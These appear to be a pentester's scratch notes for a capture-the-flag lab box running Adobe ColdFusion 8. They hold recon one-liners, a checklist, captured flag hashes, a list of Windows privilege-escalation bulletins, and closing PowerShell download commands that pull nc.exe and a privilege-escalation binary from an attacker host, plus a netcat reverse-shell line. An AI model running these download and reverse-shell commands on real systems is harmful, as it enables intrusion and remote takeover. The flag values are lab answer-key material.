tmux setenv target 10.129.54.45 && export target=10.129.54.45
tmux setenv attack $attack && export attack=$attack

- tun1
attack=$(ip a show dev tun1 | egrep -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')

- PORTS
ports=$(sudo nmap -Pn -T4 $target -oN ports.txt | egrep "^[0-9]{2,5}" | sed -E "s#/.*##g" | tr "\n" "," | sed 's/.$//') && echo $ports

- etc/hosts
sudo sed -i "/$target      domain/d" /etc/hosts
echo "$target      domain" | sudo tee -a /etc/hosts

[] Mount points
[] SMB
[] DNS
[] ftp
[] http enum
    [] folders 
    [] files -x txt,php,html
[] run as admin
[] cron jobs
[] SQL injection


How many ports?

Versions?

Paths of URL?

Known CVE

user.txt
99cc542464ab60e21c2271fb0e0874bd

root.txt
70b12ddc16181dd8a30ea3fded416fce

Adobe ColdFusion 8 - Remote Command Execution (RCE)

[M]MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M]MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E]MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]  http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]  http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E]MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M]MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M]MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E]MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E]MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M]MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M]MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical


powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.134:8080/jp64.exe', 'C:\Users\tolis\AppData\Local\Temp\jp64.exe')"

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.134:8080/nc.exe', 'C:\Users\tolis\AppData\Local\Temp\nc.exe')"

echo C:\Users\tolis\AppData\Local\Temp\nc.exe -e cmd.exe 10.10.14.134 1234 > priv.bat

who